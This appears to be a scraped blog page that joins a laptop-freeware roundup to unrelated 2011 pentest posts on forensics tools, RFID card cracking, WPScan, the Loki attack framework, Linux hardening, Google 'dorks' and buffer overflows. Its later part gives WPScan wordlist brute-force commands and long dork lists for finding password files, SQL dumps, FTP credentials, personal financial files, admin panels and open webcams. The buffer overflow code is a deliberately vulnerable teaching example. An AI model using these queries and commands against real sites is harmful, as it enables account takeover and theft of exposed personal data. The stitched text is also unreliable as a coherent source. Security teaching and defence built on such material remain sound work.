If you own a desktop in addition to a laptop, you constantly have to deal with synchronising files and folders between them. If you’re not careful, you’ll end up working on older files on one computer while the newer versions sit on the other. Worse yet, when copying files between the machines, you might accidentally overwrite a newer version with an older one. The following three freebies solve those problems for you. They can synchronise your files automatically, and they can even synchronise between PCs and Macs.

SugarSync Free

This excellent software does double duty as a synchronisation tool and as an automated backup program. Exceedingly simple to use, it offers 2GB of free online backup space, takes up little RAM and few system resources, and works with Macs as well as PCs. All that, and it’s free.

Simply install the software on your computers and indicate which folders to synchronise. SugarSync Free then works in the background. If the computer to which you wish to sync is not online, the files will sync to it when it returns. In addition to syncing the files, SugarSync Free backs them up online.

You can do a lot more, too, such as sharing files and folders with other people. The software also keeps older versions of your file online so that you can revert to any of them.

The free edition of the software will synchronise only two computers, and it has a limit of 2GB of online storage space. For-pay versions let you synchronise among multiple PCs and offer faster upload speeds; prices range from $5 per month to $25 per month.

Download SugarSync Free | Price: Free

Windows Live Sync

What if you want to synchronise your laptop with more than one other desktop or laptop, but you don’t want to spend the money that SugarSync charges for it? Give the free Windows Live Sync a try. With this tool, you can sync folders on as many computers as you want, and you don’t have to pay a penny. Keep in mind, however, that this software doesn’t include online backup; it only synchronises folders from computer to computer.

Using Windows Live Sync is even easier than working with SugarSync Free. The method of adding and removing folders is more straightforward. Since you manage everything from a website, you can set up your synchronisation options in a single step rather than multiple ones.

Like SugarSync, Windows Live Sync works with Macs as well as PCs. However, I have been unable to get the software to work with Snow Leopard, the newest version of Mac OS X. If you want to synchronise with a Snow Leopard Mac, you may run into problems.

Download Windows Live Sync | Price: Free

Xmarks

Here’s a common problem for laptop owners who also have another machine: How do you keep your Favorites and bookmarks synchronised among all your computers? Let’s say that you browse the web on your laptop, adding a few bookmarks and deleting a few. The next day you use your desktop, but of course it doesn’t have the latest bookmark changes you made. Trying to make the corresponding additions and deletions on the desktop’s web browser can be time consuming, and that’s assuming you even remember them all.

Xmarks solves the problem neatly. It synchronises the bookmarks on multiple PCs, and better yet, it does so between browsers as well: With its help, you can keep Internet Explorer bookmarks on one PC synchronised with Firefox bookmarks on another. The tool even works on multiple operating systems, including Windows, Mac, and Linux.

The software used to be known as Foxmarks. Since then, its creators have updated it with additional features, including the ability to offer information about sites when you conduct searches. The extras are useful, but you’ll really want this software for its synchronisation of the bookmarks on all your PCs.

Download Xmarks | Price: Free

Laptop Battery Managers
Ah, batteries, the bane of every laptop owner’s existence. They never seem to have enough power, and they run out far too quickly. These downloads will help you manage your laptop’s battery life, and they can even help you get more juice out of a single charge.

BattCursor

You have work to do, but you know that your battery is starting to run out. So you keep checking the laptop’s battery icon to see how much power is left and every time you check, you waste precious time. Sound familiar?

This clever, free program shows your laptop’s remaining battery life on your mouse cursor. The app can display the information on your desktop, as well.

You can have the cursor text’s color and transparency level change, depending on the power level. For example, you can set the program to keep the text transparent in cases when your laptop is connected to a power source, but visible if the portable is unplugged and below a certain power level. BattCursor has a lot of extras, too, such as ways to improve your notebook’s battery life.

Download BattCursor | Price: Free

BatteryBar

Want to check battery life, but don’t like the idea of having your mouse pointer display the text? Here’s another alternative. BatteryBar shows, on your taskbar, exactly how much juice you’ve already used and how much you have left. You can set the app to display remaining battery life either as a percentage or as an amount of time.

Hover your mouse over BatteryBar, and you’ll see even more information, including the total battery capacity, the discharge rate, the battery wear, and how much total capacity your battery has in terms of time per full charge.

When you first run the program, it won't appear to work. You'll need to configure your taskbar to display it: right-click the taskbar and select Toolbars, BatteryBar. Once you do that, the program will appear.

Download BatteryBar | Price: Free

Wireless Networking Utilities
One of the main reasons to use a laptop is that you can connect wirelessly when you’re away from your home or office. But finding a connection, and keeping safe when you are connected, can be problematic. Here are two downloads that can help.

Hotspot Shield

When you use your laptop to connect to a hotspot at a public location such as a coffee shop or airport, you put yourself at risk. Hackers may be able to sniff your data packets, invade your PC and steal your username and password when you log in to websites.

Here’s a freebie that promises to keep you safe by encrypting your connection when you’re at a hotspot so that no one else can read the information you send. The program is extremely easy to use. Install it and it logs you in to a virtual private network (VPN) that performs the encryption.

A few installation notes: If you don’t want various toolbars to install too, make sure to uncheck the boxes next to the toolbar items during installation. And if you don’t want your home page and search engine to be changed, uncheck those options as well.

Download Hotspot Shield | Price: Free

WeFi

If you’re a laptop owner and a fan of social networking, you can combine the two with WeFi. Not only does this program find hotspots so that you can connect to them, but it also finds people to whom you can connect as well. After you install WeFi, the app lists nearby hotspots along with information about each, such as the signal strength and whether the hotspot is encrypted. To connect to one, double click it. You can also go to a web page that displays a map of where you are and shows nearby hotspots.

To see people who are connected to hotspots near you, click the People tab. You can then see more information about any of them, and get in touch with them via the software.

WeFi also includes a feature that will warn you away from suspicious web pages. If you prefer, however, you can turn it off during the installation process: Uncheck the box next to Include Wi-Fi Secure Browsing.

Note that this program will make WeFi Search your home page, establish WeFi Search as your default search, and install a toolbar. If you prefer that it not do that, during the installation process select Custom and uncheck the boxes for Toolbar, Make WeFi Search my default search engine, and Make WeFi Search my homepage. Also, during installation, WeFi will ask you to install a variety of additional software. To be safe, uncheck the boxes next to those items.

Download WeFi | Price: Free

USB Flash Drive Programs
USB flash drives are designed to be portable, just like your laptop. But they can be problematic. For one thing, how can you make sure that your files aren’t compromised in the event that you lose your drive? We have a few downloads to help with that, and more.

PortableApps

If your laptop or netbook has only a modest hard drive, you may not be able to fit all of your applications on it. Microsoft Office, for example, can occupy plenty of hard disk space and leave you little room for anything else.

With PortableApps, you won’t have that problem. In this download you get a full suite of free applications, including OpenOffice.org, which has a word processor, a spreadsheet, a presentation program, a database, and a drawing program. You’ll also find an antivirus utility, a slimmed down version of Firefox, and more. In addition to the applications, you get backup software, plus a menu that makes accessing all of the programs easy.

The Light version takes up just 150MB installed, and the more full featured Standard version consumes 355MB. You can install the software on your laptop or netbook of course, but to save space you can install the programs on a USB drive and even run them from there. You can store your data on the USB drive as well. No matter how little storage space your laptop or netbook has, you’ll be set.

Download PortableApps Standard | Price: Free

Download PortableApps Light | Price: Free

TrueCrypt

USB drives are a great way to carry work with you when you travel. They’re light, they’re cheap, and they have enough capacity to handle large image files, hefty documents, and entire presentations. But you can easily lose or misplace them, a serious problem if your files are personal or sensitive.

The free TrueCrypt does an excellent job of keeping your files safe from prying eyes, even if your USB drive falls into the wrong hands. You get a choice of many different encryption algorithms, including the powerful 256-bit AES and 448-bit Blowfish methods. The program will not just encrypt the files and folders, but also hide them so that no one but you knows that they are there.

This isn’t the most intuitive of programs to work with, so take some time to read the manual and be sure to use the program’s built-in wizards.

Download TrueCrypt | Price: Free

Computer Forensic Framework-PTK

Computer forensics is a branch of digital forensic science: the practice of investigating, analyzing, identifying and collecting evidence or information that is encoded or stored.
Computer forensic science is a growing field, and different colleges offer a variety of degrees in it; however, there are also different tools and tricks available to get the job done. In BackTrack 5 there is a separate section for forensic tools.

Besides tools and tricks, there is plenty of training available on the Internet.
PTK Forensics is a computer forensic framework for the command-line tools in The Sleuth Kit, plus many more software modules. This makes it usable and makes it easy to investigate a system.

PTK Forensics is more than just a new, highly professional graphical interface based on Ajax and other advanced technologies; it offers numerous features such as analysis, search and management of complex digital investigation cases.

Key Features

Efficient file analysis
Easier to use: PTK is based on Ajax
PTK is a dynamic web application with a centralised database, so multiple investigators can work on the same case at the same time
PTK is a forensic analysis framework; in fact, PTK does not address incident response issues
Its main aim is to help small groups of investigators execute complex consultancy quickly and efficiently
A log of all operations performed by the investigators is kept
Case sharing features: multiple investigators per case, and case locking
It is available in both a free and a Pro version. It has been tested on various Linux distributions, including:
Ubuntu
Mac OS X
CentOS
Kubuntu
If you are using BackTrack 5, then there is no need to download PTK because it is already available on BackTrack 5.

Download

Requirements
Linux
MySQL server 5 or higher
Apache web server 2 or higher
PHP 5
Web browser (Mozilla, Safari)
SleuthKit
Tutorial
After downloading, move the package to your Apache www directory and extract it. Open a browser and use the following URL to start the installer page:
http://localhost/ptk/install.php

RFID bootable Live Hacking System

The bootable Live RFID Hacking System contains a ready-to-use set of hacking tools for breaking and analyzing MIFARE Classic RFID cards and other well-known card formats. It is built around PCSC-lite, the CCID free software driver and libnfc, which gives you access to some of the most common RFID readers.

List of tools included

pcscd – you need to run this daemon in a separate terminal before running any RFID reader related tools in this bootable Live distribution. We use a wrapper script which calls pcscd in superuser mode with the correct parameters.
baudline FFT signal analyzer for sniffing LF RFID tags using our sound card based RFID sniffer/emulator (more information soon!).
hexdump & od for converting binary dumps into hexfiles for easier editing and kdiff3 difference analysis.
kdiff3 – for displaying differences between card hexdump text files
vbindiff – for displaying difference between card dump binary files
bsdiff/bspatch – binary diff/patch tool
lsnfc (for guessing the card type)
gtkterm serial console utility.
nfc-anticol (runs full ISO14443A anticollision)
nfc-list
pn53x-diagnose
pn53x-sam
pn53x-tamashell
RSA_SecurID_getpasswd
And much more

Note: for 64bit x86 systems only!

Download RFID bootable Live Here

tq pentestit.com

Wednesday, July 13, 2011

Bokken: A pyew GUI for Malware Analysis!

Bokken was recently introduced in Inguma penetration toolkit (version 0.3 to be precise!). Now, it has also been released as a stand-alone tool for malware analysis. In actuality, Bokken is a GUI for the pyew tool. So, you know that it can do all that pyew can, with a nice user interface.

So, what is pyew and what can it do? Pyew is like another tool we wrote about, radare. Pyew is a (command-line) Python tool, mainly for analyzing malware. It has support for hexadecimal viewing, disassembly (Intel 16, 32 and 64 bit), PE and ELF file formats (it does code analysis the right way), following direct call/jmp instructions, the OLE2 format, the PDF format (limited) and more. It also supports plugins to add more features to the tool. Now that is quite a lot of functions!

However, it should be known that Bokken is neither a hexadecimal editor nor a full-featured disassembler as yet, so it should not be used for deep code analysis, and you might want to avoid modifying files with Bokken. It is intended to be a *iew-like tool, mainly for analyzing malware. Actually, Bokken can parse and help in the analysis of PE/ELF files, PDFs and websites; any other file can also be opened and studied, but Bokken won't analyze it. To be precise, Bokken can help you scan the following:

> PE/ELF files can be analyzed in hexadecimal and disassembly formats, and further information can be gained with the plugins.
> Web sites can also be analyzed for malware or security issues.
> PDF files are supported, and some features can aid in their examination for malicious code.
> Finally, all other files can be studied, whether they are in binary or plain text format.

Bokken requirements are just a few and easy to install. In order to get Bokken working you will need:

> Pyew
> PyGtk
> GtkSourceview2
> TidyLib
> Psyco

Download Bokken 1.0 (bokken-1.0.tar.gz/bokken-1.0.zip) here.

tq pentestit.com for sharing.

WPScan: A WordPress Security Scanner!

WPScan is a black box WordPress security scanner written in Ruby which attempts to find known security weaknesses within WordPress installations. It is intended for security professionals or WordPress administrators to assess the security posture of their WordPress installations. The code base is open source and licensed under the GPLv3. It has been brought to us by Ryan Dewhurst, AKA ethicalhack3r.

Features of wpscan:

Username enumeration (from author)
Weak password cracking (multithreaded)
Version enumeration (from generator meta tag)
Vulnerability enumeration (based on version)
Plugin enumeration (todo)
Plugin vulnerability enumeration (based on version) (todo)
Other miscellaneous checks

Most blogging sites run on WordPress, which often gets hacked through simple, known errors. WPScan can simply help find those known errors so they can be avoided.

Basic requirements:
WPScan requires two non-native Ruby gems, typhoeus and xml-simple. It should work on both Ruby 1.8.x and 1.9.x.

How to run wpscan?
1. ruby wpscan.rb --url www.example.com
2. ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50
3. ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin

It uses two files – wp_vulns.xml and plugin_vulns.xml, that simply contain vulnerabilities associated with WordPress plugins and affected versions. This has been compiled from many public sources. If you happen to know of a few exploits that are not public, you could even add them to these files and extend the use of WPScan! It also includes a WordPress bruteforcer – bruter.rb

Download WPScan (wpscan.rb) here - SVN checkout.

sharing from www.pentestit.com

Loki: An Open Source Layer 3 Packet Generating and Attacking Python Framework!

When we speak of layer 3, the network layer, very few tools have the power or capability to support all the protocols for packet generation and attack. To name a few, we have tools like Cain & Abel, Scapy, Yersinia and hping. Yersinia and Scapy, our favourites, need a bit of knowledge before being set up. Enter Loki, a Python-based GUI framework implementing many packet generation and attack modules for layer 3 protocols!

Loki was released by security researchers from the Germany-based ERNW GmbH at BlackHat USA 2010. It includes a GUI that has been programmed in GTK/Glade and lots of protocols that none of the other tools have implemented yet! To be precise, the following protocols are supported:

ARP
HSRP, HSRPv2
RIP
BGP
OSPF
EIGRP [not-yet-to-be-released due to legal blur]
WLCCP [not-yet-to-be-released due to legal blur]
VRRP, VRRPv3
BFD
LDP
MPLS (re-labeling, tunnel interface)

Based on the above mentioned protocols, it supports the following attacks:

ARP:
Arp spoofing
Arp scanning
Arp flooding
BFD:
DoS of existing BFD session
BGP:
NLRI injection
EIGRP:
EIGRP TLV injection
Authenticated / Unauthenticated DoS
HSRP, HSRPv2:
IP address take-over
LDP:
Injection of label mapping messages
MPLS:
Rewrite of MPLS labels
MPLS-VPN enabled network stack
OSPF:
Injection of LSAs
MD5 authentication cracking
RIP:
Route injection
TCP-MD5:
RFC2385 authentication cracking
VRRP, VRRPv3:
IP Address take-over
WLCCP:
Winning the WDS master election
Sniffing and cracking of infrastructure authentication (asleap)
Sniffing and generating of CTK nonce and key
Sniffing and decryption of client PMK

It replicates some of the functionality of Yersinia and Scapy, but does so in a much more useful package while adding support for lots of new protocols commonly found in enterprise networks. It allows you to manipulate network protocols for man-in-the-middle attacks. Actually, it is a GUI for many tools, such as mplstun.

Loki requires that you have the following versions of software installed:

python v2.6.5
pygobject v2.20.0
pygtk v2.16.0
libglade v2.6.4
dnet v1.11
pylibpcap v0.5.1
dpkt v1.6
ipy v0.70, 0.64

Download Loki v0.2.4 (loki.py) here.

Tuesday, July 12, 2011

7 Best Linux Server Security Tips

Linux seems to be the most secure and powerful server platform, but remember that nothing in this world is secure by itself; you have to make it secure. If you are running a Linux server and have not patched it, it may be compromised, so the point is that an administrator should secure the box against hackers (crackers). There are different levels of security; application-layer security, for example, means web application security against issues like SQL injection and XSS.

Application-layer security is not the point of this article; in this article I will discuss Linux server hardening tips.

Use Strong Passwords
I assume that you have an idea of the importance of passwords and of password-based attacks, so use strong passwords with upper- and lower-case letters, numbers and special characters, and try to make the password policy strict.

Use Cryptography
Cryptography is the art of secret communication. All the data that goes through the network may be sniffed, so use encryption to secure your data. OpenVPN is a cost-effective, lightweight SSL VPN. Use scp, ssh, rsync or sftp for file transfer.

Avoid Remote Log Ins
As mentioned in the previous tip, data that goes over the network may be captured, and services like FTP, Telnet and other file transfer protocols may be compromised, so avoid using these services from a remote location. If you need to use them, you must use a secure channel, such as OpenSSH or FTPS.

Patch Management
There are different exploits available for different software and services, so make sure to follow a patch management strategy to keep your Linux kernel and all the software and services running on that server up to date. Keep your OS up to date to secure Linux; if you have questions like why patch management matters, or about patch management policies, follow the link to learn more.

Use Intrusion Detection Systems
Firewalls have their limitations, so use intrusion detection systems (IDS); you must configure both a network IDS (NIDS) and a host IDS (HIDS) to protect against attacks like DoS, port scanning etc. We have discussed IDS in detail in different articles; click here to learn more.

Use Linux Security Extensions
Securing the Linux kernel is the key point in securing the Linux server. There are various security packages available to provide additional security for the Linux kernel; try to use software like SELinux, AppArmor or grsecurity.

Use Log Management
Use a strong log management policy to keep an eye on changes and errors. Besides the built-in Linux log files, there is different software that provides auditing and log management policies.

Recommended reading: 20 Linux Server Hardening Security Tips
Note: If you want to learn more about Linux- and Windows-based penetration testing, you might want to subscribe to our RSS feed or email subscription, or become our Facebook fan! You will get all the latest updates in both places.

Monday, July 11, 2011

Google Hacking Part 2

As in the first part, where arbu posted about the basics of Google hacking, in this part I am just going to put up some of the basic, important Google dorks that a hacker uses.

This article is only for educational purposes, so if anyone misuses it, that will not be my responsibility or this blog's responsibility.

Google queries for locating various Web servers

“Apache/1.3.28 Server at” intitle:index.of

Apache 1.3.28

“Apache/2.0 Server at” intitle:index.of

Apache 2.0

“Apache/* Server at” intitle:index.of

any version of Apache

“Microsoft-IIS/4.0 Server at” intitle:index.of

Microsoft Internet Information Services 4.0

“Microsoft-IIS/5.0 Server at” intitle:index.of

Microsoft Internet Information Services 5.0

“Microsoft-IIS/6.0 Server at” intitle:index.of

Microsoft Internet Information Services 6.0

“Microsoft-IIS/* Server at” intitle:index.of

any version of Microsoft Internet Information Services

“Oracle HTTP Server/* Server at” intitle:index.of

any version of Oracle HTTP Server

“IBM_HTTP_Server/* * Server at” intitle:index.of

any version of IBM HTTP Server

“Netscape/* Server at” intitle:index.of

any version of Netscape Server

“Red Hat Secure/*” intitle:index.of

any version of the Red Hat Secure server

“HP Apache-based Web Server/*” intitle:index.of

any version of the HP server

Queries for discovering standard post-installation pages

intitle:”Test Page for Apache Installation” “You are free”

Apache 1.2.6

intitle:”Test Page for Apache Installation” “It worked!” “this Web site!”

Apache 1.3.0 – 1.3.9

intitle:”Test Page for Apache Installation” “Seeing this instead”

Apache 1.3.11 – 1.3.33, 2.0

intitle:”Test Page for the SSL/TLS-aware Apache Installation” “Hey, it worked!”

Apache SSL/TLS

intitle:”Test Page for the Apache Web Server on Red Hat Linux”

Apache on Red Hat

intitle:”Test Page for the Apache Http Server on Fedora Core”

Apache on Fedora

intitle:”Welcome to Your New Home Page!”

Apache on Debian

intitle:”Welcome to IIS 4.0!”

IIS 4.0

intitle:”Welcome to Windows 2000 Internet Services”

IIS 5.0

intitle:”Welcome to Windows XP Server Internet Services”

IIS 6.0

Querying for application-generated system reports

“Generated by phpSystem”

operating system type and version, hardware configuration, logged users, open connections, free memory and disk space, mount points

“This summary was generated by wwwstat”

web server statistics, system file structure

“These statistics were produced by getstats”

web server statistics, system file structure

“This report was generated by WebLog”

web server statistics, system file structure

intext:”Tobias Oetiker” “traffic analysis”

system performance statistics as MRTG charts, network configuration

intitle:”Apache::Status” (inurl:server-status | inurl:status.html | inurl:apache.html)

server version, operating system type, child process list, current connections

intitle:”ASP Stats Generator *.*” “ASP Stats Generator” “2003-2004 weppos”

web server activity, lots of visitor information

intitle:”Multimon UPS status page”

UPS device performance statistics

intitle:”statistics of” “advanced web statistics”

web server statistics, visitor information

intitle:”System Statistics” +”System and Network Information Center”

system performance statistics as MRTG charts, hardware configuration, running services

intitle:”Usage Statistics for” “Generated by Webalizer”

web server statistics, visitor information, system file structure

intitle:”Web Server Statistics for ****”

web server statistics, visitor information

inurl:”/axs/ax-admin.pl” -script

web server statistics, visitor information

inurl:”/cricket/grapher.cgi”

MRTG charts of network interface performance

inurl:server-info “Apache Server Information”

web server version and configuration, operating system type, system file structure

“Output produced by SysWatch *”

operating system type and version, logged users, free memory and disk space, mount points, running processes, system logs

SQL injection dorks

allinurl:”index php go buy”
allinurl:”index.php?go=sell”
allinurl:”index php go linkdir”
allinurl:”index.php?go=resource_center”
allinurl:”resource_center.html”
allinurl:”index.php?go=properties”
allinurl:”index.php?go=register”

Dorks for finding admin pages

admin1.php
admin1.html
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
adm/
admin/
admin/account.php
admin/account.html
admin/index.php
admin/index.html
admin/login.php
admin/login.html
admin/home.php
admin/controlpanel.html
admin/controlpanel.php
admin.php
admin.html
admin/cp.php
admin/cp.html
cp.php
cp.html
administrator/
administrator/index.html
administrator/index.php
administrator/login.html
administrator/login.php
administrator/account.html
administrator/account.php
administrator.php
administrator.html
login.html
modelsearch/login.php
moderator.php
moderator.html
moderator/login.php
moderator/login.html
moderator/admin.php
moderator/admin.html
moderator/
account.php
account.html
controlpanel/
controlpanel.php
controlpanel.html
admincontrol.php
admincontrol.html
adminpanel.php
adminpanel.html
admin1.asp
admin2.asp
yonetim.asp
yonetici.asp
admin/account.asp
admin/index.asp
admin/login.asp
admin/home.asp
admin/controlpanel.asp
admin.asp
admin/cp.asp
cp.asp
administrator/index.asp
administrator/login.asp
administrator/account.asp
administrator.asp
login.asp
modelsearch/login.asp
moderator.asp
moderator/login.asp
moderator/admin.asp
account.asp
controlpanel.asp
admincontrol.asp
adminpanel.asp
fileadmin/
fileadmin.php
fileadmin.asp
fileadmin.html
administration/
administration.php
administration.html
sysadmin.php
sysadmin.html
phpmyadmin/
myadmin/
sysadmin.asp
sysadmin/
ur-admin.asp
ur-admin.php
ur-admin.html
ur-admin/
Server.php
Server.html
Server.asp
Server/
wp-admin/
administr8.php
administr8.html
administr8/
administr8.asp
webadmin/
webadmin.php
webadmin.asp
webadmin.html
administratie/
admins/
admins.php
admins.asp
admins.html
administrivia/
Database_Administration/
WebAdmin/
useradmin/
sysadmins/
admin1/
system-administration/
administrators/
pgadmin/
directadmin/
staradmin/
ServerAdministrator/
SysAdmin/
administer/
LiveUser_Admin/
sys-admin/
typo3/
panel/
cpanel/
cPanel/
cpanel_file/
platz_login/
rcLogin/
blogindex/
formslogin/
autologin/
support_login/
meta_login/
manuallogin/
simpleLogin/
loginflat/
utility_login/
showlogin/
memlogin/
members/
login-redirect/
sub-login/
wp-login/
login1/
dir-login/
login_db/
xlogin/
smblogin/
customer_login/
UserLogin/
login-us/
acct_login/
admin_area/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
radmind/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
Lotus_Domino_Admin/
bbadmin/
vmailadmin/
Indy_admin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
Super-Admin/
AdminTools/
cmsadmin/
SysAdmin2/
globes_admin/
cadmins/
phpSQLiteAdmin/
navSiteAdmin/
server_admin_small/
logo_sysadmin/
server/
database_administration/
power_user/
system_administration/
ss_vms_admin_sm/

Error message queries

“A syntax error has occurred” filetype:ihtml

Informix database errors, potentially containing function names, filenames, file structure information, pieces of SQL code and passwords

“Access denied for user” “Using password”

authorisation errors, potentially containing user names, function names, file structure information and pieces of SQL code

“The script whose uid is ” “is not allowed to access”

access-related PHP errors, potentially containing filenames, function names and file structure information

“ORA-00921: unexpected end of SQL command”

Oracle database errors, potentially containing filenames, function names and file structure information

“error found handling the request” cocoon filetype:xml

Cocoon errors, potentially containing Cocoon version information, filenames, function names and file structure information

“Invision Power Board Database Error”

Invision Power Board bulletin board errors, potentially containing function names, filenames, file structure information and piece of SQL code

“Warning: mysql_query()” “invalid query”

MySQL database errors, potentially containing user names, function names, filenames and file structure information

“Error Message : Error loading required libraries.”

CGI script errors, potentially containing information about operating system and program versions, user names, filenames and file structure information

“#mysql dump” filetype:sql

MySQL database errors, potentially containing information about database structure and contents

Dorks for locating passwords

“http://*:*@www” site

passwords for site, stored as the string “http://username:password@www…”

filetype:bak inurl:”htaccess|passwd|shadow|ht users”

file backups, potentially containing user names and passwords

filetype:mdb inurl:”account|users|admin|administrators|passwd|password”

mdb files, potentially containing password information

intitle:”Index of” pwd.db

pwd.db files, potentially containing user names and encrypted passwords

inurl:admin inurl:backup intitle:index.of

directories whose names contain the words admin and backup

“Index of/” “Parent Directory” “WS_FTP.ini”
filetype:ini WS_FTP PWD

WS_FTP configuration files, potentially containing FTP server access passwords

ext:pwd inurl:(service|authors|administrators|users) “# -FrontPage-”

files containing Microsoft FrontPage passwords

filetype:sql (“passwd values ****” | “password values ****” | “pass values ****” )

files containing SQL code and passwords inserted into a database

intitle:index.of trillian.ini

configuration files for the Trillian IM

eggdrop filetype:user

user configuration files for the Eggdrop ircbot

filetype:conf slapd.conf

configuration files for OpenLDAP

inurl:”wvdial.conf” intext:”password”

configuration files for WV Dial

ext:ini eudora.ini

configuration files for the Eudora mail client

filetype:mdb inurl:users.mdb

Microsoft Access files, potentially containing user account information

Searching for personal data and confidential documents

filetype:xls inurl:”email.xls”

email.xls files, potentially containing contact information

“phone * * *” “address *” “e-mail” intitle: “curriculum vitae”

CVs

“not for distribution”

confidential documents containing the confidential clause

buddylist.blt

AIM contacts list

intitle:index.of mystuff.xml

Trillian IM contacts list

filetype:ctt “msn”

MSN contacts list

filetype:QDF

QDF database files for the Quicken financial application

intitle:index.of finances.xls

finances.xls files, potentially containing information on bank accounts, financial summaries and credit card numbers

intitle:”Index Of” -inurl:maillog maillog size

maillog files, potentially containing e-mail

“Network Vulnerability Assessment Report”
“Host Vulnerability Summary Report”
filetype:pdf “Assessment Report”
“This file was generated by Nessus”

reports for network security scans, penetration tests etc

Dorks for locating network devices

“Copyright (c) Tektronix, Inc.” “printer status”

PhaserLink printers

inurl:”printer/main.html” intext:”settings”

Brother HL printers

intitle:”Dell Laser Printer” ews

Dell printers with EWS technology

intext:centreware inurl:status

Xerox Phaser 4500/6250/8200/8400 printers

inurl:hp/device/this.LCDispatcher

HP printers

intitle:liveapplet inurl:LvAppl

Canon Webview webcams

intitle:”EvoCam” inurl:”webcam.html”

Evocam webcams

inurl:”ViewerFrame?Mode”

Panasonic Network Camera webcams

(intext:”MOBOTIX M1” | intext:”MOBOTIX M10”) intext:”Open Menu” Shift-Reload

Mobotix webcams

inurl:indexFrame.shtml Axis

Axis webcams

intitle:”my webcamXP server!” inurl:”:8080”

webcams accessible via WebcamXP Server

allintitle:Brains, Corp. camera

webcams accessible via mmEye

intitle:”active webcam page”

USB webcams

Buffer Over Flow Attack

If you are reading this post then you definitely have some idea about computer programming and processes. A computer program executes various processes and carries out the computations for which it was created.

In the new era of programming we generally see that companies recruit only those programmers who are efficient at programming. Nowadays it is not enough that the objective of your program is fulfilled; code efficiency is also taken into account, where code efficiency is judged over a series of situations (depending upon the objective of your program).

A buffer overflow attack is an example of exploiting the vulnerability left by inefficient programming, so we see a lot of inefficient programmers who are responsible for server crashes.

To introduce buffer overflows to a newbie, I would say that a buffer overflow is a condition where a process or a program attempts to store data beyond a fixed-length temporary memory area, better known as a buffer.

It is generally accepted that the best solution to buffer overflow attacks is to fix the defective programs. However, fixing a defective program requires in-depth knowledge of programming.

A buffer is a contiguously allocated chunk of memory, such as an array or a pointer in C. In C and C++ there is no automatic bounds checking on the buffer, which means a user can write past a buffer.

For example:

int main () {
    int buffer[10];    /* room for ten ints, valid indices 0..9 */
    buffer[20] = 10;   /* index 20 is past the end: the compiler accepts it, the behaviour is undefined */
    return 0;
}

The above C program is a valid program, and every compiler can compile it without any errors. However, the program attempts to write beyond the allocated memory for the buffer, which might result in unexpected behavior. Over the years, some bright people have used only this concept to create havoc in the computer industry. Before we understand how they did it, let’s first see what a process looks like in memory.

A process is a program in execution. An executable program on disk contains a set of binary instructions to be executed by the processor; some read-only data, such as printf format strings; global and static data that lasts throughout the program execution; and a brk pointer that keeps track of the malloced memory. Function local variables are automatic variables created on the stack whenever functions execute, and they are cleaned up as the function terminates. (You can read about processes in depth in the wiki; I am not going into too much detail about this here.)

Memory layout of a Linux process:

A process starts with the program's code and data. Code and data consist of the program's instructions and the initialized and uninitialized static and global data, respectively. After that is the run-time heap (created using malloc/calloc), and then at the top is the user's stack. This stack is used whenever a function call is made.

(Figure: memory layout of a Linux process; image credits to Linux Journal)

Another example to illustrate this:

#include <string.h>

void function (char *str) {
    char buffer[16];
    strcpy (buffer, str);   /* no bounds check: copies until the NUL, however long str is */
}

int main () {
    char *str = "Hi My name is saurabh tiwari"; /* length of str = 29 bytes, including the terminating NUL */
    function (str);
    return 0;
}

This program is guaranteed to cause unexpected behavior, because a string (str) of 29 bytes has been copied to a location (buffer) that has been allocated for only 16 bytes. The extra bytes run past the buffer and overwrite the space allocated for the FP (the saved frame pointer), the return address and so on. This, in turn, corrupts the process stack. The function used to copy the string is strcpy, which does no bounds checking. Using strncpy would have prevented this corruption of the stack. However, this classic example shows that a buffer overflow can overwrite a function's return address, which in turn can alter the program's execution path. Recall that a function's return address is the address of the next instruction in memory, which is executed immediately after the function returns.
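As an added example (not from the original post or from Sandeep Grover's article), here is a hardened counterpart to function() above: a check that reports how far strcpy() would overrun the 16-byte buffer, and a bounded copy that also handles the strncpy caveat (strncpy does not NUL-terminate when the source is too long). The string and the buffer size are the page's; BUF_SIZE, overflow_bytes, copy_bounded and function_safe are names chosen here.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

#define BUF_SIZE 16   /* same size as the 16-byte buffer in the example above */

/* How many bytes a NUL-terminated string would spill past a buffer of
   buf_size bytes if it were copied with strcpy(). 0 means it fits, NUL
   included. For the page's 29-byte string and a 16-byte buffer this is 13. */
size_t overflow_bytes(const char *str, size_t buf_size) {
    size_t needed = strlen(str) + 1;          /* characters plus the terminating NUL */
    return needed > buf_size ? needed - buf_size : 0;
}

/* Bounded copy. Returns true if the whole string (with NUL) fit into dst,
   false if it had to be truncated. dst is always NUL-terminated on return.
   Caveat for the strncpy() suggested above: strncpy(dst, src, n) writes no
   terminator when src has n or more characters, so callers must set
   dst[n-1] = '\0' themselves; doing it here keeps that rule in one place. */
bool copy_bounded(char *dst, size_t dst_size, const char *src) {
    if (dst_size == 0)
        return false;
    size_t len = strlen(src);
    if (len >= dst_size) {
        memcpy(dst, src, dst_size - 1);       /* copy only what fits */
        dst[dst_size - 1] = '\0';
        return false;
    }
    memcpy(dst, src, len + 1);                /* fits, NUL included */
    return true;
}

/* Hardened counterpart of function() from the page: the 16-byte buffer can
   no longer be overrun, whatever the caller passes. Returns whether str fit. */
bool function_safe(const char *str) {
    char buffer[BUF_SIZE];
    bool fit = copy_bounded(buffer, sizeof buffer, str);
    printf("buffer holds \"%s\" (%s)\n", buffer, fit ? "complete" : "truncated");
    return fit;
}

int main(void) {
    const char *str = "Hi My name is saurabh tiwari";   /* the page's 29-byte string */
    printf("strcpy() would write %zu bytes past the buffer\n",
           overflow_bytes(str, BUF_SIZE));                /* 13 */
    function_safe(str);                                   /* truncated to 15 chars */
    function_safe("short");                               /* fits */
    return 0;
}
```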

How to implement the above example (source: Sandeep Grover)

